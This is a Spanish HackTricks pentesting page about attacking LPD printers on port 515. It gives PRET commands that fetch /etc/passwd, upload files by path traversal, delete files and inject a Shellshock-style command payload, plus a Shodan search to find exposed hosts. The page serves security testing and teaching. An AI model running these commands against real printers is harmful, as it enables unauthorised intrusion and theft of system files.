3.2 KiB
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Equipos Rojos de AWS de HackTricks)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén la merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Introducción al Protocolo LPD
En la década de 1980, se desarrolló el protocolo Line Printer Daemon (LPD) en Berkeley Unix, que posteriormente se formalizó a través de RFC1179. Este protocolo opera sobre el puerto 515/tcp, permitiendo interacciones a través del comando lpr
. La esencia de la impresión a través de LPD implica enviar un archivo de control (para especificar detalles del trabajo y del usuario) junto con un archivo de datos (que contiene la información de impresión). Mientras que el archivo de control permite la selección de varios formatos de archivo para el archivo de datos, el manejo de estos archivos está determinado por la implementación específica de LPD. Una implementación ampliamente reconocida para sistemas tipo Unix es LPRng. Es importante destacar que el protocolo LPD puede ser explotado para ejecutar trabajos de impresión maliciosos de PostScript o PJL.
Herramientas para Interactuar con Impresoras LPD
PRET presenta dos herramientas esenciales, lpdprint
y lpdtest
, que ofrecen un método sencillo para interactuar con impresoras compatibles con LPD. Estas herramientas permiten una variedad de acciones, desde imprimir datos hasta manipular archivos en la impresora, como descargar, subir o eliminar:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Para aquellas personas interesadas en explorar más a fondo el mundo del hackeo de impresoras, se puede encontrar un recurso completo aquí: Hackeando Impresoras.
Shodan
puerto 515